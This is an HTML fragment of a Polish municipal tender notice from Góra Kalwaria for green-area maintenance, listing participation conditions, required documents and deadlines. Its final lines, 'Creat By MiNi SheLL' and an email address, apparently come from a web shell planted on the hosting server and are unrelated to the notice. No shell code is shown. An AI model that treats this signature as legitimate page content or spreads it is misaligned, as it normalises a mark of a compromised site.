<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał minimum 1 usługę polegającą na utrzymaniu zieleni o wartości minimum 50.000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych). ; potwierdzoną  referencjami itp. od poprzednio zamawiających
1.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykonawca musi posiadać ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 50 000,00 PLN (słownie:  pięćdziesiąt tysięcy złotych).
1.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, wypełniony i podpisany przez Wykonawcę - Załącznik Nr 1 do niniejszej SIWZ,
Oświadczenie o spełnieniu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 załącznik numer 3
Oświadczenie o braku podstaw do wykluczenia  z postępowania załącznik numer 4
Pełnomocnictwo zgodne z obowiązującymi przepisami prawa, wystawione dla osoby (osób) upoważnionych do reprezentowania oferenta w toku postępowania o udzielenie zamówienia publicznego, o ile nie wynika ono z przedstawionych dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany danych adresowych Zamawiającego lub Wykonawcy;
 W przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie wszczęcia postępowania przetargowego, a które są niezbędne dla prawidłowej realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorakalwaria.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego ul. Ratuszowa 1 u głównego specjalisty d/s  zamówień publicznych w godzinach urzędowania Zamawiającego lub pobrać ze strony Zamawiającego www.bip.gorakalwaria.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2011 godzina 10:00, miejsce: Biuro Obsługi Mieszkańca Urząd Miasta i Gminy Góra Kalwaria  ul. 3-go Maja 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com